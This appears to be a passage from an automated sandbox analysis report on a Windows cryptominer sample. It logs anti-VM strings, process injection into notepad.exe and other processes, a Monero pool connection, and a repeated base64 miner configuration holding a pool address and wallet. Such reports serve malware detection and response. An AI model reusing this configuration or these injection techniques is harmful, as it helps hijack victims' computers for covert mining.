                        Source: P7Oa6i5muL.exe, 00000005.00000002.466131413.0000000001100000.00000004.00000020.sdmpBinary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==v)5
                        Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.219062127.00000172CE340000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.271644731.000001D873140000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.466491261.0000017D02740000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.310120947.00000148E8D40000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.348580078.0000024727000000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                        Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmpBinary or memory string: vmware
                        Source: cfg.5.drBinary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==
                        Source: cfgi.5.drBinary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWpi
                        Source: svchost.exe, 00000019.00000002.347799615.00000247260A6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                        Source: P7Oa6i5muL.exe, 00000005.00000002.466131413.0000000001100000.00000004.00000020.sdmp, svchost.exe, 0000000B.00000002.468335769.0000023808655000.00000004.00000001.sdmp, svchost.exe, 00000019.00000002.347865649.00000247260EB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: svchost.exe, 0000000F.00000002.462076297.0000014885E02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                        Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.219062127.00000172CE340000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.271644731.000001D873140000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.466491261.0000017D02740000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.310120947.00000148E8D40000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.348580078.0000024727000000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                        Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.219062127.00000172CE340000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.271644731.000001D873140000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.466491261.0000017D02740000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.310120947.00000148E8D40000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.348580078.0000024727000000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                        Source: svchost.exe, 0000000F.00000002.462469594.0000014885E3E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.462448213.0000026677429000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.219062127.00000172CE340000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.271644731.000001D873140000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.466491261.0000017D02740000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.310120947.00000148E8D40000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.348580078.0000024727000000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\notepad.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary,5_2_004080E0
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00402E40 mov eax, dword ptr fs:[00000030h]5_2_00402E40
                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exeCode function: 6_2_035D2E40 mov eax, dword ptr fs:[00000030h]6_2_035D2E40
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00401800 GetProcessHeap,HeapAlloc,5_2_00401800
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\notepad.exeNetwork Connect: 144.217.14.139 108Jump to behavior
                        Source: C:\Windows\notepad.exeDomain query: xmr-us-east1.nanopool.org
                        Allocates memory in foreign processesShow sources
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory allocated: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: 35D0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory allocated: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: C20000 protect: page read and writeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory allocated: C:\Windows\notepad.exe base: 400000 protect: page read and writeJump to behavior
                        Creates a thread in another existing process (thread injection)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeThread created: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe EIP: 35D8390Jump to behavior
                        Injects a PE file into a foreign processesShow sources
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeMemory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: 35D0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Windows\notepad.exe base: 400000 value starts with: 4D5AJump to behavior
                        Modifies the context of a thread in another process (thread injection)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeThread register set: target process: 2168Jump to behavior
                        Writes to foreign memory regionsShow sources
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeMemory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeMemory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeMemory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 409000Jump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeMemory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 40C000Jump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeMemory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 5D3000Jump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeMemory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: C76008Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: 35D0000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: C20000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Windows\notepad.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Windows\notepad.exe base: 401000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Windows\notepad.exe base: 938000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Windows\notepad.exe base: A15000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMemory written: C:\Windows\notepad.exe base: 32E94F2010Jump to behavior
                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exeCode function: DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,Process32Next,CloseHandle,FreeLibrary, explorer.exe6_2_035D80E0
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'Jump to behavior
                        Source: P7Oa6i5muL.exe, 00000005.00000002.466253599.0000000001840000.00000002.00000001.sdmp, jwMZjhPggeDR.exe, 00000006.00000000.220278674.00000000018D0000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.462513360.000001DB60D90000.00000002.00000001.sdmpBinary or memory string: Program Manager
                        Source: P7Oa6i5muL.exe, 00000005.00000002.466253599.0000000001840000.00000002.00000001.sdmp, jwMZjhPggeDR.exe, 00000006.00000000.220278674.00000000018D0000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.462513360.000001DB60D90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                        Source: P7Oa6i5muL.exe, 00000005.00000002.466253599.0000000001840000.00000002.00000001.sdmp, jwMZjhPggeDR.exe, 00000006.00000000.220278674.00000000018D0000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.462513360.000001DB60D90000.00000002.00000001.sdmpBinary or memory string: Progman
                        Source: P7Oa6i5muL.exe, 00000005.00000002.466253599.0000000001840000.00000002.00000001.sdmp, jwMZjhPggeDR.exe, 00000006.00000000.220278674.00000000018D0000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.462513360.000001DB60D90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Users\user\Desktop\P7Oa6i5muL.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
